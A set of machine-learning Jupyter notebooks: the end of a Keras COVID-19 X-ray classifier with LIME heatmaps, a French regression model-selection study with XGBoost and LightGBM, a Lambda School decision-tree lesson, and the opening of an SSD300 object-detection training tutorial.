output = Dropout(0.2,name='Dropout')(output)
#ReLU layer
output = Dense(10, activation = 'relu',name='ReLU')(output)
#Dense layer
output = Dense(5, activation='softmax',name='softmax')(output)
# the actual model train)
model = Model(inputs=inputs, outputs=output)
print("[INFO] compiling model...")
opt = Adam(lr=INIT_LR, decay=INIT_LR / EPOCHS)
model.compile(loss="categorical_crossentropy", optimizer=opt,
metrics=["accuracy"])
model.summary()
from tensorflow.keras.callbacks import ModelCheckpoint
model_checkpoint = ModelCheckpoint(filepath="/content/drive/My Drive/Dataset5C/Model",
monitor='val_loss', save_best_only=True)
## train
print("[INFO] training head...")
H = model.fit({'images': xt},
{'softmax': yt},
batch_size = BS,
epochs = EPOCHS,
validation_data=(xval, yval),
callbacks=[model_checkpoint],
shuffle=True)
#Load the best model trained
model = load_model("/content/drive/My Drive/Dataset5C/Model")
## eval
print("[INFO] evaluating network...")
print()
print("Loss: "+ str(round(model.evaluate(testX,testY,verbose=0)[0],2))+ " Acc: "+ str(round(model.evaluate(testX,testY,verbose=1)[1],2)))
print()
predIdxs = model.predict(testX)
predIdxs = np.argmax(predIdxs, axis=1) # argmax for the predicted probability
#print(classification_report(testY.argmax(axis=1), predIdxs,target_names=lb.classes_))
cm = confusion_matrix(testY.argmax(axis=1), predIdxs)
total = sum(sum(cm))
#print(total) #60
acc = (cm[0, 0] + cm[1, 1] + cm[2, 2] + cm[3,3]+ cm[4,4]) / total
#sensitivity = cm[0, 0] / (cm[0, 0] + cm[0, 1])
#specificity = cm[1, 1] / (cm[1, 0] + cm[1, 1])
# show the confusion matrix, accuracy, sensitivity, and specificity
print(cm)
print("acc: {:.4f}".format(acc))
#print("sensitivity: {:.4f}".format(sensitivity))
#print("specificity: {:.4f}".format(specificity))
## explain
N = EPOCHS
plt.style.use("ggplot")
plt.figure(1)
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["accuracy"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_accuracy"], label="val_acc")
plt.title("Precision of COVID-19 detection.")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
#plt.axis([0, EPOCHS, 0.3, 0.9])
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_cero_plot_Inception_2nd_time.png")
plt.show()
import cv2
plt.figure(2)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=5, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
plt.imshow((mask +imagen)/255)
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Normal"+str(ind)+".png")
plt.show()
plt.figure(3)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=5, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((50,50),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 1)
mask = cv2.blur(mask,(30,30))
plt.imshow((mask +imagen)/255)
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Light"+str(ind)+".png")
plt.show()
plt.figure(4)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=3, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((50,50),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 1)
mask = cv2.blur(mask,(30,30))
mask = np.array(mask, dtype=np.uint8)
mask = cv2.medianBlur(mask,5)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
mask = cv2.applyColorMap(mask, cv2.COLORMAP_HOT) #heatmap
end = cv2.addWeighted((imagen/255), 0.7, mask/255, 0.3, 0)
plt.imshow((end))
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Heat_map_purple"+str(ind)+".png")
plt.show()
plt.figure(4)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=2, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((30,30),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 2)
mask = cv2.blur(mask,(30,30))
mask = cv2.blur(mask,(30,30))
mask = np.array(mask, dtype=np.uint8)
mask = cv2.medianBlur(mask,5)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
mask2 = cv2.applyColorMap((mask), cv2.COLORMAP_JET) #heatmap
mask = cv2.blur(mask,(60,60))
mask = cv2.applyColorMap(mask, cv2.COLORMAP_HOT) #heatmap
mask = ((mask*1.1 + mask2*0.7)/255)*(3/2)
end = cv2.addWeighted(imagen/255, 0.8, mask2/255, 0.3, 0)
#end = cv2.addWeighted(end, 0.8, mask/255, 0.2, 0)
plt.imshow((end))
cv2.imwrite("/content/drive/My Drive/Maps/Heat_map"+str(ind)+".png",end*255)
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Heat_map"+str(ind)+".png")
plt.show()
plt.figure(5)
for ind in range(1):
explainer = lime_image.LimeImageExplainer()
explanation = explainer.explain_instance(testX[-ind], model.predict,
hide_color=0, num_samples=42)
print("> label:", testY[ind].argmax(), "- predicted:", predIdxs[ind])
temp, mask = explanation.get_image_and_mask(
explanation.top_labels[0], positive_only=True, num_features=1, hide_rest=True)
mask = np.array(mark_boundaries(temp/2 +1, mask))
#print(mask.shape)
imagen = testX[ind]
imagen[:,:,0] = imagen[:,:,2]
imagen[:,:,1] = imagen[:,:,2]
mask[:,:,0] = mask[:,:,2]
mask[:,:,1] = mask[:,:,2]
kernel = np.ones((30,30),np.uint8)
mask = cv2.dilate(mask,kernel,iterations = 2)
mask = cv2.blur(mask,(30,30))
mask = cv2.blur(mask,(30,30))
mask = np.array(mask, dtype=np.uint8)
mask = cv2.medianBlur(mask,5)
mask = cv2.cvtColor(mask, cv2.COLOR_BGR2GRAY)
mask2 = cv2.applyColorMap((mask), cv2.COLORMAP_JET) #heatmap
mask = cv2.blur(mask,(60,60))
mask = cv2.applyColorMap(mask, cv2.COLORMAP_HOT) #heatmap
mask = ((mask*1.1 + mask2*0.7)/255)*(3/2)
end = cv2.addWeighted(imagen/255, 0.8, mask2/255, 0.3, 0)
#end = cv2.addWeighted(end, 0.8, mask/255, 0.2, 0)
deep = np.reshape(end,newshape=(512,512,3),order='C')
CHANNEL1=deep[:,:,2]
CHANNEL2=deep[:,:,0]
deep[:,:,0] = CHANNEL1
#deep[:,:,2] = CHANNEL2
plt.imshow((deep))
plt.savefig("/content/drive/My Drive/Dataset5C/Model/trained_pulmons_inception_Heat_map_ma"+str(ind)+".png")
plt.show()
```
|
github_jupyter
|
# Models selection
Maintenant que nous avons créé des features grâce à l'étude du domaine métier et à l'EDA, et que nous les avons sélectionnées grâce à Boruta, nous pouvons passer à la phase de sélection du ou des modèles les plus adaptées à notre dataset.
L'EDA soulève quelques interrogations à ce sujet mais le meilleur moyen reste de tester une variété de modèles avec quelques combinaisons de leurs hyperparamètres.
Un mot sur les hyperparamètres : pour le learning rate ou la régularisation, ajouter 0.1 à 0.01 à un effet important sur le comportement du modèle, en revanche ajouter 0.1 à 10 n'a pratiquement aucune conséquence. Ainsi, pour le learning rate, nous devrions privilégier une distribution logarithmique du paramètre.
```
from model_selector.run_regressors import run_linear_models, run_svm_models, run_neighbor_models, run_gaussian_models, run_nn_models, run_tree_models
from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone
from sklearn.model_selection import KFold, cross_val_score, train_test_split
from sklearn.metrics import mean_squared_error
import pickle
import xgboost as xgb
import seaborn as sns
from typing import List
import scipy.stats as stats
import pandas as pd
import sqlite3 as sql
import matplotlib.pyplot as plt
%matplotlib inline
sns.set_theme(style="darkgrid")
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
train = pd.read_csv('../data/train.csv', index_col='date')
test = pd.read_csv('../data/test.csv', index_col='date')
y_train = train.reel
X_train = train.drop(['reel'], axis=1)
y_test = test.reel
X_test = test.drop(['reel'], axis=1)
X_test.head()
```
## 1. Les modèles linéaires
```
# run_linear_models(X_train, y_train, small = True, normalize_x = False)
```

## 2. Les modèles support vector machines (SVM)
De la documentation de Scikit-learn :
La complexité du temps d'ajustement du modèle SVR est plus que quadratique avec le nombre d'échantillons, ce qui rend difficile l'adaptation à des ensembles de données de plus de 10 000 échantillons. Pour les grands ensembles de données, envisagez d'utiliser LinearSVR ou SGDRegressor à la place, éventuellement après un transformateur Nystroem.
Ici, vu la taille de notre dataset, nous utilisons le modèle LinearSVR uniquement.
```
# run_svm_models(X_train, y_train, small = True, normalize_x = False)
```

LinearSVR n'apporte pas d'amélioration par rapport à LassoLars
## 3. Les modèles basés sur les distances
```
# run_neighbor_models(X_train, y_train, normalize_x = False)
```

KNN est, dans le cadre de ce jeu de données, relativement mauvais par rapport aux modèles précédement testés.
## 4. Les modèles gaussiens
```
# run_gaussian_models(X_train, y_train, small = True, normalize_x = False)
```

Tout comme SVM avant, ce modèle nécessite une grande quantité de RAM car son implémentation dans Scikit-learn demande de calculer une matrice de covarriance sur l'ensemble du train set. Au vu de notre large dataset, cela n'est pas réalisable ici. Tout comme SVM, nous pourrions probablement tenter une approche d'entraînement par batch.
## 5. Les réseaux de neuronnes
```
# run_nn_models(X_train, y_train, small = True, normalize_x = False)
```

MLPRegressor obtient des résultats solides dans la veine des modèles linéaires.
## 6. Les modèles à base d'arbres de décision
```
# run_tree_models(X_train, y_train, small = True, normalize_x = False)
```

De façon assez suprenante un simple arbre de décision obtient le meilleur score jusqu'à présent. Une bonne idée est de continuer dans la direction de modèles plus perfectionnés à base d'arbres.
## 7. Les modèles ensemblistes (bagging)
```
run_ensemble_models(X_train, y_train, small = True, normalize_x = False)
```

<br>
La tendance est confirmée par ce run, il semblerait que les modèles à base d'arbres soient de bon candidats sur ce jeu de données. Voyons maintenant la technique du boosting.
## 8. Les modèles ensemblistes (boosting) : XGBoost et LGBM
Xgboost et LGBM ne sont pas encore implémentés dans mon package de sélection de modèle, on opère donc une randomized search manuelle.
```
from xgboost import XGBRegressor
from sklearn.model_selection import RandomizedSearchCV
from sklearn.model_selection import TimeSeriesSplit, cross_val_score
import time
# n_estimators doit être tune plus tard
# car les paramètres échantillonnés avec des n_estimators plus élevés
# obtiendront un avantage injuste (default=100)
params = {
'n_estimators': [100, 150, 250, 500],
'min_child_weight': [2, 4, 6],
'gamma': [i/10.0 for i in range(2, 6)],
'max_depth': [3, 5, 8],
'learning_rate': [0.01, 0.05, 0.1, 0.2]
}
reg = XGBRegressor(seed=42)
n_iter_search = 100
cv_ts = TimeSeriesSplit(n_splits=3)
random_search = RandomizedSearchCV(reg, param_distributions=params, verbose = 2,
n_iter=n_iter_search, cv=cv_ts, scoring='neg_mean_squared_error', random_state=42)
start = time.time()
random_search.fit(X_train, y_train)
print("RandomizedSearchCV took %.2f seconds for %d candidates"
" parameter settings." % ((time.time() - start), n_iter_search))
best_xgbr = XGBRegressor(base_score=0.5, booster='gbtree', colsample_bylevel=1,
colsample_bynode=1, colsample_bytree=1.0, gamma=0.5, gpu_id=-1,
importance_type='gain', interaction_constraints='',
learning_rate=0.1, max_delta_step=0, max_depth=3,
min_child_weight=4, monotone_constraints='()',
n_estimators=95, n_jobs=8, num_parallel_tree=1, random_state=0,
reg_alpha=0, reg_lambda=1, scale_pos_weight=1, subsample=1,
tree_method='exact', validate_parameters=1, verbosity=None)
best_xgbr.fit(X_train, y_train)
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error
def print_metrics(y_true, y_predicted):
print('Root Mean Square Error = ' +
str(np.sqrt(mean_squared_error(y_true, y_predicted))))
print('Mean Absolute Error = ' +
str(mean_absolute_error(y_true, y_predicted)))
print('Median Absolute Error = ' +
str(median_absolute_error(y_true, y_predicted)))
y_pred = best_xgbr.predict(X_test)
print_metrics(y_test**2, y_pred**2)
pickle.dump(best_xgbr, open('models/best_xgbr.sav', 'wb'))
import lightgbm as lgb
# n_estimators doit être tune plus tard
# car les paramètres échantillonnés avec des n_estimators plus élevés
# obtiendront un avantage injuste (default=100)
params = {
'n_estimators': [100, 150, 250, 500],
'num_leaves': [8, 32, 64, 128, 256],
'max_depth': [3, 5, 8],
'boosting_type': ['gbdt', 'dart', 'goss'],
'learning_rate': [0.01, 0.05, 0.1, 0.2]}
lgbr = lgb.LGBMRegressor(seed=42)
n_iter_search = 100
random_search = RandomizedSearchCV(lgbr, param_distributions=params, verbose=2,
n_iter=n_iter_search, cv=cv_ts, scoring='neg_mean_squared_error', random_state=42)
start = time.time()
random_search.fit(X_train, y_train)
print("RandomizedSearchCV took %.2f seconds for %d candidates"
" parameter settings." % ((time.time() - start), n_iter_search))
best_lgbr = lgb.LGBMRegressor(max_depth=5, n_estimators=150, num_leaves=8)
best_lgbr.fit(X_train, y_train)
y_pred = best_lgbr.predict(X_test)
print_metrics(y_test**2, y_pred**2)
pickle.dump(best_lgbr, open('models/best_lgbr.sav', 'wb'))
```
On observe des résulats très solides de la part de XGBoost et LGBM.
## Conclusion
Mon package de sélection de modèle a rendu ses conclusions. Encore une fois, celui-ci n'est pas omniscient et est encore très perfectible. En effet, il est tout simplement impossible de créer un package qui balaye de façon exhaustive tous les espaces d'hyperparamètres et ce pour chaque jeu de données. Cependant, c'est un outil riche d'enseignement quant au type de modèle à utiliser pour tel ou tel dataset. Ici très clairement les modèles à base d'arbres sont les grands gagnants et cela n'est pas si surprenant car on l'a constaté lors de l'EDA, les relations entre les prédicteurs et la variable indépendantes ne sont la plupart du temps pas linéaires, mais bien plus complexes.
Afin d'aller au bout des choses, il serait intéressant de retenir les principaux modèles sélectionnés et des les tuner avec une autre technique que Gridsearch : l'optimisation Bayésienne. De plus, il serait utile de tenter des méthodes d'agrégation de modèles afin de voir si l'on peut encore progresser en termes de performance.
Les modèles avec lesquels je souhaite poursuivre l'exploration :
- ElasticNet et LassoLars
- Multilayer perceptron
- Random Forest
- XGBoost et LightGBM
|
github_jupyter
|
_Lambda School Data Science — Tree Ensembles_
# Decision Trees
### Links
- A Visual Introduction to Machine Learning, [Part 1: A Decision Tree](http://www.r2d3.us/visual-intro-to-machine-learning-part-1/), and [Part 2: Bias and Variance](http://www.r2d3.us/visual-intro-to-machine-learning-part-2/)
- [Decision Trees: Advantages & Disadvantages](https://christophm.github.io/interpretable-ml-book/tree.html#advantages-2)
- [How decision trees work](https://brohrer.github.io/how_decision_trees_work.html)
- [How a Russian mathematician constructed a decision tree - by hand - to solve a medical problem](http://fastml.com/how-a-russian-mathematician-constructed-a-decision-tree-by-hand-to-solve-a-medical-problem/)
- [Let’s Write a Decision Tree Classifier from Scratch](https://www.youtube.com/watch?v=LDRbO9a6XPU) — _Don’t worry about understanding the code, just get introduced to the concepts. This 10 minute video has excellent diagrams and explanations._
### Libraries to install
#### graphviz (to visualize trees)
Anaconda:
```conda install python-graphviz```
Google Colab:
```!pip install graphviz
!apt-get install graphviz
```
#### ipywidgets (optional, for interactive widgets)
Anaconda: Already installed
Google Colab: [Doesn't work](https://github.com/googlecolab/colabtools/issues/60#issuecomment-462529981)
#### mlxtend (to plot decision regions)
[mlxtend.plotting.plot_decision_regions](http://rasbt.github.io/mlxtend/user_guide/plotting/plot_decision_regions/): `pip install mlxtend`
### Imports and helper functions
```
%matplotlib inline
import graphviz
from IPython.display import display
from ipywidgets import interact
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
import numpy as np
import pandas as pd
import seaborn as sns
from sklearn.impute import SimpleImputer
from sklearn.linear_model import LinearRegression
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor, export_graphviz
def viztree(decision_tree, feature_names):
"""Visualize a decision tree"""
dot_data = export_graphviz(decision_tree, out_file=None, feature_names=feature_names,
filled=True, rounded=True)
return graphviz.Source(dot_data)
def viz3D(fitted_model, df, feature1, feature2, target='', num=100):
"""
Visualize model predictions in 3D, for regression or binary classification
Parameters
----------
fitted_model : scikit-learn model, already fitted
df : pandas dataframe, which was used to fit model
feature1 : string, name of feature 1
feature2 : string, name of feature 2
target : string, name of target
num : int, number of grid points for each feature
References
----------
https://jakevdp.github.io/PythonDataScienceHandbook/04.12-three-dimensional-plotting.html
https://scikit-learn.org/stable/auto_examples/tree/plot_iris.html
"""
x1 = np.linspace(df[feature1].min(), df[feature1].max(), num)
x2 = np.linspace(df[feature2].min(), df[feature2].max(), num)
X1, X2 = np.meshgrid(x1, x2)
X = np.c_[X1.flatten(), X2.flatten()]
if hasattr(fitted_model, 'predict_proba'):
predicted = fitted_model.predict_proba(X)[:,1]
else:
predicted = fitted_model.predict(X)
Z = predicted.reshape(num, num)
fig = plt.figure()
ax = plt.axes(projection='3d')
ax.plot_surface(X1, X2, Z, cmap='viridis')
ax.set_xlabel(feature1)
ax.set_ylabel(feature2)
ax.set_zlabel(target)
return fig
```
# Golf Putts (1 feature, non-linear)
https://statmodeling.stat.columbia.edu/2008/12/04/the_golf_puttin/
```
%matplotlib inline
import matplotlib.pyplot as plt
columns = ['distance', 'tries', 'successes']
data = [[2, 1443, 1346],
[3, 694, 577],
[4, 455, 337],
[5, 353, 208],
[6, 272, 149],
[7, 256, 136],
[8, 240, 111],
[9, 217, 69],
[10, 200, 67],
[11, 237, 75],
[12, 202, 52],
[13, 192, 46],
[14, 174, 54],
[15, 167, 28],
[16, 201, 27],
[17, 195, 31],
[18, 191, 33],
[19, 147, 20],
[20, 152, 24]]
putts = pd.DataFrame(columns=columns, data=data)
putts['rate of success'] = putts['successes'] / putts['tries']
putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts');
```
### OLS Regression
```
%matplotlib inline
import matplotlib.pyplot as plt
putts_X = putts[['distance']]
putts_y = putts['rate of success']
lr = LinearRegression()
lr.fit(putts_X, putts_y)
print('R^2 Score', lr.score(putts_X, putts_y))
ax = putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts')
ax.plot(putts_X, lr.predict(putts_X));
```
### Decision Tree
```
%matplotlib inline
import matplotlib.pyplot as plt
def viztree(decision_tree, feature_names):
dot_data = export_graphviz(decision_tree, out_file=None, feature_names=feature_names,
filled=True, rounded=True)
return graphviz.Source(dot_data)
def putts_tree(max_depth=1):
tree = DecisionTreeRegressor(max_depth=max_depth)
tree.fit(putts_X, putts_y)
print('R^2 Score', tree.score(putts_X, putts_y))
ax = putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts')
ax.step(putts_X, tree.predict(putts_X), where='mid')
plt.show()
display(viztree(tree, feature_names=['distance']))
interact(putts_tree, max_depth=(1,6,1));
%matplotlib inline
import matplotlib.pyplot as plt
predictions = []
for distance in putts['distance']:
samples = putts.copy()
if distance <= 8.5:
samples = samples.query('distance <= 8.5')
if distance <= 4.5:
samples = samples.query('distance <= 4.5')
else:
samples = samples.query('distance > 4.5')
else:
samples = samples.query('distance > 8.5')
if distance <= 14.5:
samples = samples.query('distance <= 14.5')
else:
samples = samples.query('distance > 14.5')
prediction = samples['rate of success'].mean()
predictions.append(prediction)
print('R^2 Score', r2_score(putts_y, predictions))
ax = putts.plot('distance', 'rate of success', kind='scatter', title='Golf Putts')
ax.step(putts_X, predictions, where='mid');
```
# Wave (1 feature, non-monotonic, train/test split)
```
%matplotlib inline
import matplotlib.pyplot as plt
# Based on http://scikit-learn.org/stable/auto_examples/tree/plot_tree_regression.html
def make_data():
import numpy as np
rng = np.random.RandomState(1)
X = np.sort(5 * rng.rand(80, 1), axis=0)
y = np.sin(X).ravel()
y[::5] += 2 * (0.5 - rng.rand(16))
return X, y
wave_X, wave_y = make_data()
wave_X_train, wave_X_test, wave_y_train, wave_y_test = train_test_split(
wave_X, wave_y, test_size=0.25, random_state=42)
def regress_wave(max_depth=1):
tree = DecisionTreeRegressor(max_depth=max_depth)
tree.fit(wave_X_train, wave_y_train)
print('Train R^2 score:', tree.score(wave_X_train, wave_y_train))
print('Test R^2 score:', tree.score(wave_X_test, wave_y_test))
plt.scatter(wave_X_train, wave_y_train)
plt.scatter(wave_X_test, wave_y_test)
plt.step(wave_X, tree.predict(wave_X), where='mid')
plt.show()
interact(regress_wave, max_depth=(1,8,1));
```
# Simple housing (2 features)
https://christophm.github.io/interpretable-ml-book/interaction.html#feature-interaction
```
columns = ['Price', 'Good Location', 'Big Size']
data = [[300000, 1, 1],
[200000, 1, 0],
[250000, 0, 1],
[150000, 0, 0]]
house = pd.DataFrame(columns=columns, data=data)
house
```
### OLS Regression
```
house_X = house.drop(columns='Price')
house_y = house['Price']
lr = LinearRegression()
lr.fit(house_X, house_y)
print('R^2', lr.score(house_X, house_y))
print('Intercept \t', lr.intercept_)
coefficients = pd.Series(lr.coef_, house_X.columns)
print(coefficients.to_string())
%matplotlib notebook
%matplotlib notebook
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(lr, house, feature1='Good Location', feature2='Big Size', target='Price');
```
### Decision Tree
```
tree = DecisionTreeRegressor()
tree.fit(house_X, house_y)
print('R^2', tree.score(house_X, house_y))
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(tree, house, feature1='Good Location', feature2='Big Size', target='Price');
plt.figure()
table = house.pivot_table('Price', 'Good Location', 'Big Size')
sns.heatmap(table, annot=True, fmt='d', cmap='viridis');
```
# Simple housing, with a twist (feature interactions, 2 features)
```
house.loc[0, 'Price'] = 400000
house_X = house.drop(columns='Price')
house_y = house['Price']
house
```
### OLS Regression, without engineering an interaction term
```
lr = LinearRegression()
lr.fit(house_X, house_y)
print('R^2', lr.score(house_X, house_y))
print('Intercept \t', lr.intercept_)
coefficients = pd.Series(lr.coef_, house_X.columns)
print(coefficients.to_string())
```
### Decision Tree, without engineering an interaction term
```
tree = DecisionTreeRegressor()
tree.fit(house_X, house_y)
print('R^2', tree.score(house_X, house_y))
viztree(tree, feature_names=house_X.columns)
```
### OLS Regression, with engineered interaction term
```
house['Good Location * Big Size'] = house['Good Location'] * house['Big Size']
house_X = house.drop(columns='Price')
house_y = house['Price']
house
lr = LinearRegression()
lr.fit(house_X, house_y)
print('R^2', lr.score(house_X, house_y))
print('Intercept \t', lr.intercept_)
coefficients = pd.Series(lr.coef_, house_X.columns)
print(coefficients.to_string())
```
### Decision Tree, with engineered interaction term
```
tree = DecisionTreeRegressor()
tree.fit(house_X, house_y)
print('R^2', tree.score(house_X, house_y))
viztree(tree, feature_names=house_X.columns)
```
# Titanic (classification, interactions, non-linear / non-monotonic)
```
titanic = sns.load_dataset('titanic')
titanic['sex'] = (titanic['sex'] == 'female').astype(int)
imputer = SimpleImputer()
titanic_X = imputer.fit_transform(titanic[['age', 'sex']])
titanic_y = titanic['survived']
tree = DecisionTreeClassifier(max_depth=4)
tree.fit(titanic_X, titanic_y)
print('Accuracy', tree.score(titanic_X, titanic_y))
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(tree, titanic, feature1='age', feature2='sex', target='survived');
from sklearn.linear_model import LogisticRegression
logistic = LogisticRegression(solver='lbfgs')
logistic.fit(titanic_X, titanic_y)
print('Accuracy', tree.score(titanic_X, titanic_y))
%matplotlib notebook
import matplotlib.pyplot as plt
viz3D(logistic, titanic, feature1='age', feature2='sex', target='survived');
```
|
github_jupyter
|
# SSD300 Training Tutorial
This tutorial explains how to train an SSD300 on the Pascal VOC datasets. The preset parameters reproduce the training of the original SSD300 "07+12" model. Training SSD512 works simiarly, so there's no extra tutorial for that. The same goes for training on other datasets.
You can find a summary of a full training here to get an impression of what it should look like:
[SSD300 "07+12" training summary](https://github.com/pierluigiferrari/ssd_keras/blob/master/training_summaries/ssd300_pascal_07%2B12_training_summary.md)
```
from keras.optimizers import Adam, SGD
from keras.callbacks import ModelCheckpoint, LearningRateScheduler, TerminateOnNaN, CSVLogger
from keras import backend as K
from keras.models import load_model
from math import ceil
import numpy as np
from matplotlib import pyplot as plt
from models.keras_ssd300 import ssd_300
from keras_loss_function.keras_ssd_loss import SSDLoss
from keras_layers.keras_layer_AnchorBoxes import AnchorBoxes
from keras_layers.keras_layer_DecodeDetections import DecodeDetections
from keras_layers.keras_layer_DecodeDetectionsFast import DecodeDetectionsFast
from keras_layers.keras_layer_L2Normalization import L2Normalization
from ssd_encoder_decoder.ssd_input_encoder import SSDInputEncoder
from ssd_encoder_decoder.ssd_output_decoder import decode_detections, decode_detections_fast
from data_generator.object_detection_2d_data_generator import DataGenerator
from data_generator.object_detection_2d_geometric_ops import Resize
from data_generator.object_detection_2d_photometric_ops import ConvertTo3Channels
from data_generator.data_augmentation_chain_original_ssd import SSDDataAugmentation
from data_generator.object_detection_2d_misc_utils import apply_inverse_transforms
%matplotlib inline
```
## 0. Preliminary note
All places in the code where you need to make any changes are marked `TODO` and explained accordingly. All code cells that don't contain `TODO` markers just need to be executed.
## 1. Set the model configuration parameters
This section sets the configuration parameters for the model definition. The parameters set here are being used both by the `ssd_300()` function that builds the SSD300 model as well as further down by the constructor for the `SSDInputEncoder` object that is needed to run the training. Most of these parameters are needed to define the anchor boxes.
The parameters as set below produce the original SSD300 architecture that was trained on the Pascal VOC datsets, i.e. they are all chosen to correspond exactly to their respective counterparts in the `.prototxt` file that defines the original Caffe implementation. Note that the anchor box scaling factors of the original SSD implementation vary depending on the datasets on which the models were trained. The scaling factors used for the MS COCO datasets are smaller than the scaling factors used for the Pascal VOC datasets. The reason why the list of scaling factors has 7 elements while there are only 6 predictor layers is that the last scaling factor is used for the second aspect-ratio-1 box of the last predictor layer. Refer to the documentation for details.
As mentioned above, the parameters set below are not only needed to build the model, but are also passed to the `SSDInputEncoder` constructor further down, which is responsible for matching and encoding ground truth boxes and anchor boxes during the training. In order to do that, it needs to know the anchor box parameters.
```
img_height = 300 # Height of the model input images
img_width = 300 # Width of the model input images
img_channels = 3 # Number of color channels of the model input images
mean_color = [123, 117, 104] # The per-channel mean of the images in the dataset. Do not change this value if you're using any of the pre-trained weights.
swap_channels = [2, 1, 0] # The color channel order in the original SSD is BGR, so we'll have the model reverse the color channel order of the input images.
n_classes = 20 # Number of positive classes, e.g. 20 for Pascal VOC, 80 for MS COCO
scales_pascal = [0.1, 0.2, 0.37, 0.54, 0.71, 0.88, 1.05] # The anchor box scaling factors used in the original SSD300 for the Pascal VOC datasets
scales_coco = [0.07, 0.15, 0.33, 0.51, 0.69, 0.87, 1.05] # The anchor box scaling factors used in the original SSD300 for the MS COCO datasets
scales = scales_pascal
aspect_ratios = [[1.0, 2.0, 0.5],
[1.0, 2.0, 0.5, 3.0, 1.0/3.0],
[1.0, 2.0, 0.5, 3.0, 1.0/3.0],
[1.0, 2.0, 0.5, 3.0, 1.0/3.0],
[1.0, 2.0, 0.5],
[1.0, 2.0, 0.5]] # The anchor box aspect ratios used in the original SSD300; the order matters
two_boxes_for_ar1 = True
steps = [8, 16, 32, 64, 100, 300] # The space between two adjacent anchor box center points for each predictor layer.
offsets = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5] # The offsets of the first anchor box center points from the top and left borders of the image as a fraction of the step size for each predictor layer.
clip_boxes = False # Whether or not to clip the anchor boxes to lie entirely within the image boundaries
variances = [0.1, 0.1, 0.2, 0.2] # The variances by which the encoded target coordinates are divided as in the original implementation
normalize_coords = True
```
## 2. Build or load the model
You will want to execute either of the two code cells in the subsequent two sub-sections, not both.
### 2.1 Create a new model and load trained VGG-16 weights into it (or trained SSD weights)
If you want to create a new SSD300 model, this is the relevant section for you. If you want to load a previously saved SSD300 model, skip ahead to section 2.2.
The code cell below does the following things:
1. It calls the function `ssd_300()` to build the model.
2. It then loads the weights file that is found at `weights_path` into the model. You could load the trained VGG-16 weights or you could load the weights of a trained model. If you want to reproduce the original SSD training, load the pre-trained VGG-16 weights. In any case, you need to set the path to the weights file you want to load on your local machine. Download links to all the trained weights are provided in the [README](https://github.com/pierluigiferrari/ssd_keras/blob/master/README.md) of this repository.
3. Finally, it compiles the model for the training. In order to do so, we're defining an optimizer (Adam) and a loss function (SSDLoss) to be passed to the `compile()` method.
